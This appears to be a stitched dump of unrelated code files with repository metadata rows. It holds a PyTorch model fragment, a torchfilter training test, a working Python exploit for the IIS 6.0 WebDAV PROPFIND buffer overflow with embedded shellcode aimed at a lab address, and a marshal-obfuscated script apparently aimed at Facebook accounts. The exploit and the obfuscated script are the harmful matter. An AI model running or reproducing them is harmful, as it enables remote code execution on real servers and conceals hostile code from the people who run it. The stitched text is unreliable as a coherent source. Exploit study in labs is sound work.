height = self.height_regressor(output_averaged)
return height
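A hedged usage sketch of the forward() contract written above: the input tensor is squeezed on dim 1 and split into a list of raw waveforms, and UpstreamTransformer returns (height, age, gender), each of shape (batch, 1). Instantiating the model pulls the s3prl upstream via torch.hub, so this is illustrative rather than an offline-runnable test.
model = UpstreamTransformer(upstream_model='wav2vec2', num_layers=6, feature_dim=768)
model.eval()
with torch.no_grad():
    x = torch.randn(2, 1, 16000)       # (batch, 1, samples) of raw audio at 16 kHz
    height, age, gender = model(x)     # regression heads plus sigmoid gender classifier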
| 42.028571
| 113
| 0.669613
| 365
| 2,942
| 5.167123
| 0.224658
| 0.089077
| 0.07211
| 0.04666
| 0.839343
| 0.829268
| 0.829268
| 0.81018
| 0.81018
| 0.81018
| 0
| 0.016889
| 0.235214
| 2,942
| 70
| 114
| 42.028571
| 0.821333
| 0.03603
| 0
| 0.705882
| 0
| 0
| 0.025415
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.078431
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2c21253c36a48f6ec8d55065fc36321359f0722
| 4,931
|
py
|
Python
|
tests/test_train_e2e.py
|
brentyi/torchfilter
|
da0250baf2197f59b6e67f37cafdd63015380cbb
|
[
"MIT"
] | 84
|
2020-09-08T07:33:04.000Z
|
2022-03-30T17:25:00.000Z
|
tests/test_train_e2e.py
|
brentyi/diffbayes
|
da0250baf2197f59b6e67f37cafdd63015380cbb
|
[
"MIT"
] | 4
|
2020-11-03T14:32:11.000Z
|
2021-05-12T02:49:49.000Z
|
tests/test_train_e2e.py
|
brentyi/diffbayes
|
da0250baf2197f59b6e67f37cafdd63015380cbb
|
[
"MIT"
] | 18
|
2020-11-04T22:20:55.000Z
|
2021-12-21T10:23:26.000Z
|
import torch
from _linear_system_fixtures import (
buddy,
generated_data,
generated_data_numpy_list,
single_step_dataloader,
subsequence_dataloader,
)
from _linear_system_models import (
LinearDynamicsModel,
LinearKalmanFilterMeasurementModel,
LinearParticleFilterMeasurementModel,
LinearVirtualSensorModel,
get_trainable_model_error,
state_dim,
)
import torchfilter
def test_train_ekf_e2e(subsequence_dataloader, buddy):
"""Check that training our EKF end-to-end drops both dynamics and measurement
errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
measurement_model = LinearKalmanFilterMeasurementModel(trainable=True)
filter_model = torchfilter.filters.ExtendedKalmanFilter(
dynamics_model=dynamics_model, measurement_model=measurement_model
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_measurement_error = get_trainable_model_error(measurement_model)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert get_trainable_model_error(measurement_model) < initial_measurement_error
def test_train_ukf_e2e(subsequence_dataloader, buddy):
"""Check that training our UKF end-to-end drops both dynamics and measurement
errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
measurement_model = LinearKalmanFilterMeasurementModel(trainable=True)
filter_model = torchfilter.filters.UnscentedKalmanFilter(
dynamics_model=dynamics_model, measurement_model=measurement_model
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_measurement_error = get_trainable_model_error(measurement_model)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert get_trainable_model_error(measurement_model) < initial_measurement_error
def test_train_virtual_sensor_ekf_e2e(subsequence_dataloader, buddy):
"""Check that training our virtual sensor EKF end-to-end drops both dynamics and
virtual sensor errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
virtual_sensor_model = LinearVirtualSensorModel(trainable=True)
filter_model = torchfilter.filters.VirtualSensorExtendedKalmanFilter(
dynamics_model=dynamics_model, virtual_sensor_model=virtual_sensor_model
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_virtual_sensor_error = get_trainable_model_error(virtual_sensor_model)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert (
get_trainable_model_error(virtual_sensor_model) < initial_virtual_sensor_error
)
def test_train_pf_e2e(subsequence_dataloader, buddy):
"""Check that training our particle filter end-to-end drops both dynamics and
measurement errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
measurement_model = LinearParticleFilterMeasurementModel(trainable=True)
filter_model = torchfilter.filters.ParticleFilter(
dynamics_model=dynamics_model,
measurement_model=measurement_model,
num_particles=500,
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_measurement_error = get_trainable_model_error(
measurement_model.kalman_filter_measurement_model
)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert (
get_trainable_model_error(measurement_model.kalman_filter_measurement_model)
< initial_measurement_error
)
| 34.243056
| 86
| 0.762928
| 540
| 4,931
| 6.594444
| 0.137037
| 0.073013
| 0.081157
| 0.105027
| 0.822241
| 0.803707
| 0.780118
| 0.765234
| 0.711879
| 0.682673
| 0
| 0.005696
| 0.181099
| 4,931
| 143
| 87
| 34.482517
| 0.876176
| 0.155344
| 0
| 0.510638
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 1
| 0.042553
| false
| 0
| 0.042553
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2e779472ad1bba64a215c1a19201cb748bd25c9
| 6,149
|
py
|
Python
|
assets/img/grandpa-hackthebox/exploit.py
|
pulkittalwar2611/pulkittalwar.github.io
|
a057e3cb866d3b3a8a5c31f83524ee37d249fc2c
|
[
"MIT"
] | null | null | null |
assets/img/grandpa-hackthebox/exploit.py
|
pulkittalwar2611/pulkittalwar.github.io
|
a057e3cb866d3b3a8a5c31f83524ee37d249fc2c
|
[
"MIT"
] | null | null | null |
assets/img/grandpa-hackthebox/exploit.py
|
pulkittalwar2611/pulkittalwar.github.io
|
a057e3cb866d3b3a8a5c31f83524ee37d249fc2c
|
[
"MIT"
] | null | null | null |
'''
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Additional Information: the ScStoragePathFromUrl function is called twice
Vulnerability Type: Buffer overflow
Vendor of Product: Microsoft
Affected Product Code Base: Windows Server 2003 R2
Affected Component: ScStoragePathFromUrl
Attack Type: Remote
Impact Code execution: true
Attack Vectors: crafted PROPFIND data
Has vendor confirmed or acknowledged the vulnerability?:true
Discoverer:Zhiniang Peng and Chen Wu.
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
'''
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('10.10.10.14',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
| 136.644444
| 2,184
| 0.771833
| 1,210
| 6,149
| 3.920661
| 0.175207
| 0.027825
| 0.020868
| 0.015177
| 0.094224
| 0.091062
| 0.072091
| 0.063238
| 0.063238
| 0.051855
| 0
| 0.236475
| 0.044072
| 6,149
| 45
| 2,185
| 136.644444
| 0.570602
| 0.054968
| 0
| 0
| 0
| 0.176471
| 0.944672
| 0.916803
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.058824
| null | null | 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8258063f06ec3263078ad880d0386a9ccfb3b6b3
| 24,558
|
py
|
Python
|
India1.py
|
Sultandaku/India
|
7a6fad66fa13e2b7a4e6351a430896d8dba972b1
|
[
"Apache-2.0"
] | null | null | null |
India1.py
|
Sultandaku/India
|
7a6fad66fa13e2b7a4e6351a430896d8dba972b1
|
[
"Apache-2.0"
] | null | null | null |
India1.py
|
Sultandaku/India
|
7a6fad66fa13e2b7a4e6351a430896d8dba972b1
|
[
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9b(\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00s\xa3\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00e\x00\x00j\x0c\x00d\x02\x00\x83\x01\x00\x01xJ\x00e\r\x00d\x03\x00\x83\x01\x00D]<\x00Z\x0e\x00e\x04\x00j\x0f\x00d\x04\x00d\x05\x00\x83\x02\x00Z\x10\x00e\x11\x00d\x06\x00d\x07\x00\x83\x02\x00e\x01\x00_\x12\x00e\x10\x00GHe\x01\x00j\x12\x00j\x13\x00\x83\x00\x00\x01q\xaa\x00Wy\x10\x00d\x00\x00d\x01\x00l\x14\x00Z\x14\x00Wn\x1e\x00\x04e\x15\x00k\n\x00r\x1a\x01\x01\x01\x01e\x00\x00j\x0c\x00d\x08\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x16\x00Z\x16\x00Wn8\x00\x04e\x15\x00k\n\x00re\x01\x01\x01\x01e\x00\x00j\x0c\x00d\t\x00\x83\x01\x00\x01e\x02\x00j\x17\x00d\n\x00\x83\x01\x00\x01e\x00\x00j\x0c\x00d\x0b\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x14\x00Z\x14\x00d\x00\x00d\x01\x00l\x16\x00Z\x16\x00d\x00\x00d\x0c\x00l\x18\x00m\x19\x00Z\x19\x00\x01d\x00\x00d\r\x00l\x1a\x00m\x1b\x00Z\x1b\x00\x01d\x00\x00d\x0e\x00l\x16\x00m\x1c\x00Z\x1c\x00\x01e\x1d\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x1e\x00d\x0f\x00\x83\x01\x00\x01e\x16\x00j\x1c\x00\x83\x00\x00Z\x1f\x00e\x1f\x00j \x00e!\x00\x83\x01\x00\x01e\x1f\x00j"\x00e\x16\x00j#\x00j$\x00\x83\x00\x00d\x10\x00d\n\x00\x83\x01\x01\x01d.\x00g\x01\x00e\x1f\x00_%\x00d/\x00g\x01\x00e\x1f\x00_%\x00d\x15\x00\x84\x00\x00Z&\x00d\x16\x00\x84\x00\x00Z\'\x00d\x17\x00\x84\x00\x00Z(\x00d\x18\x00\x84\x00\x00Z)\x00d\x19\x00\x84\x00\x00Z*\x00d\x1a\x00Z+\x00g\x00\x00a,\x00g\x00\x00Z-\x00g\x00\x00a.\x00d\x1b\x00Z/\x00d\x1c\x00Z0\x00e\x00\x00j\x0c\x00d\x1d\x00\x83\x01\x00\x01d\x1e\x00GHd\x1f\x00Z1\x00d \x00Z2\x00d!\x00Z3\x00d"\x00Z4\x00xH\x00e4\x00d"\x00k\x02\x00r[\x03e5\x00d#\x00\x83\x01\x00Z6\x00e6\x00e3\x00k\x02\x00rF\x03d$\x00GHd%\x00Z4\x00q\x14\x03d&\x00GHe\x00\x00j\x0c\x00d\'\x00\x83\x01\x00\x01q\x14\x03Wd(\x00\x84\x00\x00Z7\x00d)\x00\x84\x00\x00Z8\x00d*\x00\x84\x00\x00Z9\x00d+\x00\x84\x00\x00Z:\x00d,\x00\x84\x00\x00Z;\x00e<\x00d-\x00k\x02\x00r\x9f\x03e8\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(0\x00\x00\x00i\xff\xff\xff\xffNs\x0b\x00\x00\x00rm -rf .txti\x10\'\x00\x00iG\xf4\x10\x00i\x7f\x96\x98\x00s\x04\x00\x00\x00.txtt\x01\x00\x00\x00as\x16\x00\x00\x00pip2 install mechanizes\x14\x00\x00\x00pip2 install requesti\x01\x00\x00\x00s\x17\x00\x00\x00Then type: python2 boss(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_times\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. 
U; id) Presto/2.12.423 Version/12.16s\n\x00\x00\x00user-agents\x1e\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x07\x00\x00\x00Thanks.(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x06\x00\x00\x00keluar"\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x04\x00\x00\x00acak\'\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x02c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\n\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x07\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x15\x00\x00\x00t\x01\x00\x00\x00jR\r\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR\x11\x00\x00\x000\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x02\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\xfc\xa9\xf1\xd2MbP?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x05\x00\x00\x00jalan;\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\
